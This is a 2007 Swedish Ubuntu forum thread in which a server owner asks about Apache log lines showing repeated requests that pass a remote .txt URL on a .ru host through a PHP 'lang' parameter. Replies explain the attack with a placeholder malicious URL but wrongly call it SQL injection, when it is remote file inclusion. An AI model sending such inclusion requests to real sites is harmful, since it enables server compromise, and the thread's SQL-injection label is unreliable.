Apache web server: Vad gör den här "besökaren" ?

Konfiguration av nätverk, hur man använder Ubuntu som server, och håller sin dator säker
TicToc
Inlägg: 2266
Blev medlem: 27 dec 2006, 17:28
OS: Kubuntu
Utgåva: 20.04 Focal Fossa LTS

Apache web server: Vad gör den här "besökaren" ?

Inlägg av TicToc »

En normal besökare genererar något i stil med:
58.105.241.234.optusnet.com.au - - [02/Oct/2007:07:20:59 +0200] "GET /index.php?lang=en HTTP/1.1" 200 3766
Ibland får jag mystiska händelser i min loggfil. Vad är det besökaren vill med detta? Idag har jag fått 494 rader med detta, viss variation.
bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:37 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:40 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:43 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:46 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:49 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:52 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:55 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:58 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798
Användarvisningsbild
Iceron
Inlägg: 387
Blev medlem: 22 jun 2007, 21:16
OS: Ubuntu
Utgåva: 12.04 Precise Pangolin LTS
Kontakt:

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av Iceron »

Det är någon som försöker göra en sql injection. kolla adressen: "http://amyru.h18.ru/images/cs.txt" och koden.

Jag kan ta oc kolla närmare på det efter att jag ätit  :)
Stationär: p4@2.4ghz, 512MB DDR,  nvidia 7600gs | Laptop: intel c2d@1.5ghz 1gb DDR2 | Mediacenter: p4@3ghz, 1gb ram, nvidia 6100LE | Server: p3@550mhz, 512mb ram, 420gb hd.
Bild
CenterN
Inlägg: 313
Blev medlem: 22 apr 2007, 18:21
Ort: Trollhättan
Kontakt:

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av CenterN »

Hm kanske Apache regerar på saker som händer på CS-servern eller var det bara configen? (Kikade bara snabbt)
Senast redigerad av 1 CenterN, redigerad totalt 2 gånger.
Proccesor: Amd Dual Core 4600+ 2,4 ghz
Grafikkort: Geforce 6600 (någonting)
Minne: 2*1024 mb
LJudkort: Creative Auidgy
Bildskärm: iiyama ProLite E1900S
Användarvisningsbild
Iceron
Inlägg: 387
Blev medlem: 22 jun 2007, 21:16
OS: Ubuntu
Utgåva: 12.04 Precise Pangolin LTS
Kontakt:

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av Iceron »

hmm, varför då "index.php?lang=http://amyru.h18.ru/images/cs.txt" ?
Kan ju vara någon som försökt att hacka, där sätter jag mitt mynt iallafall.
Stationär: p4@2.4ghz, 512MB DDR,  nvidia 7600gs | Laptop: intel c2d@1.5ghz 1gb DDR2 | Mediacenter: p4@3ghz, 1gb ram, nvidia 6100LE | Server: p3@550mhz, 512mb ram, 420gb hd.
Bild
Användarvisningsbild
maths57
Inlägg: 2911
Blev medlem: 22 jun 2007, 15:10
OS: Ubuntu
Utgåva: 22.10 Kinetic Kudu
Ort: Stockholm

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av maths57 »

Ser det inte ut som om besökaren försöker hämta filen cs.txt från din server? Men är det en injection? Besökaren verkar komma från Kanada. Jag får upp en sida om jag skriver in http://bell.ca/ i adressfältet.
TicToc
Inlägg: 2266
Blev medlem: 27 dec 2006, 17:28
OS: Kubuntu
Utgåva: 20.04 Focal Fossa LTS

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av TicToc »

Jaha, det låter ju tråkigt. Men eftersom jag inte kör någon sql server så är jag säker, eller?
Användarvisningsbild
Iceron
Inlägg: 387
Blev medlem: 22 jun 2007, 21:16
OS: Ubuntu
Utgåva: 12.04 Precise Pangolin LTS
Kontakt:

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av Iceron »

nej, en sql injection beöver inte ha något med mysql att göra, eller det har inte det.

Det utnyttjar hål i en hemsida.
Så att om vi tex säger att det är ett hål på hemsidan.
Den ser ut såhär när man bläddrar mellan olika sidor: <a class="postlink" href="http://www.hemsidan.com/index.php?page= ... ?page=1</a>
Men kolla, då kan det ju vara en möjlighet för en exploit där.

<a class="postlink" href="http://www.hemsidan.com/index.php?page= ... e=</a>[b]1[/b] där.

om vi nu har skadlig kod på, låt oss säga <a class="postlink" href="http://www.skadligsida.com/exploit.txt" ... oit.txt</a>

Om nu hemsidan har ett hål så kan man göra såhär:

"www.hemsidan.com/index.php?page=www.ska ... xploit.txt"

nu så startar all skadbar kod, som tex kan vara skriven i php i "www.hemsidan.com"

Då kan man få upp tex en ftp klient, kommandoskal, wget och allt som hör till, har man en ösäker server som man inte har koll på rättigheterna med så kan man till tom ladda ner virus/rootkits och andra potentiellt skadlig kod, man även gära en "deface" (om det nu heter så, kommer inte ihåg) men det var tydligen den sortens sql som de försökte göra.

Du kan läsa med om sql injections och sånt här http://en.wikipedia.org/wiki/SQL_injection bland annat.

Edit: kan fått det där med sql om bakfoten, men jag tror att jag fått det rätt, så mycket termer å sånt att hålla reda på :P
Senast redigerad av 1 Iceron, redigerad totalt 2 gånger.
Stationär: p4@2.4ghz, 512MB DDR,  nvidia 7600gs | Laptop: intel c2d@1.5ghz 1gb DDR2 | Mediacenter: p4@3ghz, 1gb ram, nvidia 6100LE | Server: p3@550mhz, 512mb ram, 420gb hd.
Bild
TicToc
Inlägg: 2266
Blev medlem: 27 dec 2006, 17:28
OS: Kubuntu
Utgåva: 20.04 Focal Fossa LTS

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av TicToc »

Tack, nu förstår jag liter mer.
Men inte trodde jag att det fanns illasinnade människor på internet.  :o
Användarvisningsbild
Iceron
Inlägg: 387
Blev medlem: 22 jun 2007, 21:16
OS: Ubuntu
Utgåva: 12.04 Precise Pangolin LTS
Kontakt:

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av Iceron »

Det finns det, men det finns ju sånna som är så snälla så att dom hackar ens dator/hemsida, men inte förstör något och säger till vad hålet är :P

Men man är aldrig säker på nätet, bara så du vet:P
Stationär: p4@2.4ghz, 512MB DDR,  nvidia 7600gs | Laptop: intel c2d@1.5ghz 1gb DDR2 | Mediacenter: p4@3ghz, 1gb ram, nvidia 6100LE | Server: p3@550mhz, 512mb ram, 420gb hd.
Bild
Okänd
Inlägg: 30172
Blev medlem: 03 mar 2008, 01:30
OS: Ubuntu

SV: Apache web server: Vad gör den här "besökaren" ?

Inlägg av Okänd »

Det händer sällan att det kommer någonting bra från adresser med .ru
http://amyru.h18.ru/

LJ
Skriv svar

Återgå till "Nätverk, säkerhet och servrar"